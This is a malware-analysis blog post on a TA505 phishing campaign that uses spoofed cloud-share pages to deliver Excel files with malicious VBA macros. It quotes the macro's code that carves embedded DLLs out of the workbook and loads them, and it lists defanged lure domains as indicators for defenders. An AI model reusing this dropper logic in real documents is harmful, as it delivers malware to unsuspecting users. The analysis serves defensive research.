Starting September we have seen a rise in campaigns from TA505 threat actor. They send emails in bulk with spoofed messages regarding hosted files on (spoofed) cloud share services. The sites look very similar to the real deal and allow download of MS Excel files and, in some cases, Word Docs, which contain VBA macros that drop and execute malicious DLLs. These campaigns are dropping RATs and downloaders. More IOCs will be provided at the end of the blog but only one example is covered in this blogpost. After all we have to do some ‘evil code analysis.’
This particular sample ‘N98300_10.21.19.xls’ (6e31b0051adf99888d50d8679c329ffb9b41991e04d8b639cc01f13e5f46656f) was downloaded from hxxps://dl2.dropbox-er[.]com/?BSoFW, which spoofed a dropbox file download page.
As soon as the file is downloaded and opened the below event should have triggered; however, due to a compilation error it stops.
Since PtrSafe is being used in both the #if and #else directives statement blocks it will fail to compile if run with VBA 6 or earlier. This macro is not backward compatible, probably a mistake from the malware author.
If we take a look at the directives the only difference is PtrSafe keywords in Win64 case and the dll file names, libDxdiag2.dll vs libDxdiag1.dll.
The function below in Module1 initializes some variables.
Public Sub AppStart()
Dim PointerNull As Object
Dim SpecialPath As String
Set PointerNull = CreateObject("WScri" + "pt.Shell") '<--WScript.Shell object
UserForm6.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm6.TextBox1.Tag + "%")
'^ contains %Temp%
UserForm6.TextBox2.Tag = PointerNull.SpecialFolders(UserForm6.TextBox2.Tag)
'^ contains %AppData%\Roaming\Microsoft\Windows\Templates
ChDir (UserForm6.TextBox1.Tag)
UserForm1.show
End Sub
The function ReplaceCurrentModule() in Module5 holds most of the meat of this malicious macro.

It concatenates some variables and strings to store filenames:
TextBox1Tag = %Temp%\libProject.xlsx
ZipName = %Temp%\libProject.xlsx.zip
ZipFolder = %Temp%
nm = %AppData%\Roaming\Microsoft\Windows\Templates\libDxdiag1
CNPK = 278528
FilePosition = 1
Now the below directives may change some of the above values based on the platform:
#If Win64 Then
nm = UserForm6.TextBox2.Tag + "\libDxdiag2"
CNPK = 252928
FilePosition = 2
And after the end of the directives .dll is appended to the nm variable.
The function KillArray in Module6 cleans all the files just in case they are already present in the above temporary locations.
'KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, nm
Public Sub KillArray(ParamArray PathList() As Variant)
On Error Resume Next
For Each Key In PathList
Kill Key
Next Key
On Error GoTo 0
End Sub

Then function ReplaceFile saves this workbook as %Temp%\libProject.xslx with file format 51 (xlOpenXMLWorkbook). More on excel file format enumeration here.
After that the same file is copied to the same folder with zip extension.
FileCopy TextBox1Tag, ZipName

In the next part of this function the ole object is copied out of the zip file location xl\embeddings\oleObject1.bin to the ZipFolder(%Temp%), as this contains the dll files.
Next the below function call from Module1 is executed:
NewValuje ZipFolder + "\oleObject" + "1" + ".b" + "in", nm, CNPK, FilePosition
This function is where it copies the embedded dll data out to the dll file. All it does is check for the MZ header and then start copying.
The function params are:
s = C:\Users\REM\AppData\Local\Temp\oleObject1.bin (source to copy from)
nm = C:\Users\REM\AppData\Roaming\Microsoft\Windows\Templates\libDxdiag1.dll (dll to copy to)
fl = 278528 (file length)
Variable_6 = 1 (or 2; file position) there are 2 DLLs embedded in the xls
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer)
Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte
Dim Variable_5() As Long
ReDim Variable_5(1 To fl)
Variable_5(1) = CByte(40 + 37) '<-- decimal 77 = M
Variable_5(2) = CByte(40 + 50) '<-- decimal 90 = Z
Variable_5(1 + 2) = CByte(40 + 104) '<-- decimal 144
'which means the Variable_5 first 3 bytes are 4d 5a 90
Variable_1 = FreeFile
Open s For Binary Access Read As Variable_1
Dim cur As Integer
cur = 1
Do While Not EOF(Variable_1)
Get Variable_1, , Variable_2
If Variable_2 = Variable_5(1) Then
Get Variable_1, , Variable_3
If Variable_3 = Variable_5(2) Then
Get Variable_1, , Variable_4
If Variable_4 = Variable_5(3) Then
If cur = Variable_6 Then 'if the first file position in case of 32 bit
For k = 4 To fl
Get Variable_1, , Variable_2
Variable_5(k) = Variable_2
Next k
Exit Do
Else
cur = cur + 1 'if the second file position in case of 64 bit
End If
End If
End If
End If
Loop
Close Variable_1
Then the DLL file is written to the location in nm variable.

At the end ReplaceCurrentModule() loads the DLL using LoadLibraryW
GetName2 (nm) 'Already imported
then calls the dll GetName function, which merely runs DLLEntryPoint.

The x64 version appears to be UPX packed.

Now this macro doesn’t do anything out of the ordinary except the social engineering part where it shows user form image that resembles install of office components as if something had failed.

Out of the most variants I have seen of this macro the above sample is the only one with the compilation error.
I use urlscan.io to hunt for similar URLs, like this query https://urlscan.io/search/#domain%3A%20googledrive-*. One can use similar queries to look for these domains. However, due to possible urlscan.io evasion the TA505 domains redirect to apple.com. But I have found this to be a good indicator that the domain is from the same group.
Below are the other domains that look like cloud storage file download pages:
Dropbox:
dropbox-er[.]com
dropbox-download[.]com
dropbox-en[.]com
dropbox-eu[.]com

OneDrive:
onedrive-sd[.]com
onedrive-sn[.]com
onedrive-sdn[.]com
onedrive-cdn[.]com
onedrive-download-en[.]com
onedrive-download[.]com
cdn-onedrive-live[.]com
onedrive-en-live[.]com
onedrive-fn[.]com

Google Drive:
googledrive-eu[.]com
googledrive-en[.]com
googledrive-gb[.]com
googledrive-download[.]com
Box:
box-en[.]com
box-cnd[.]com <– using onehub.com
Other lesser known services like owncloud and sync have also been spoofed.
own-eu-cloud[.]com
syncdownloading[.]com
sync-share[.]com
Thanks to @kyleehmke and @James_inthe_box for keeping track of this campaign and tweeting the latest IOCs.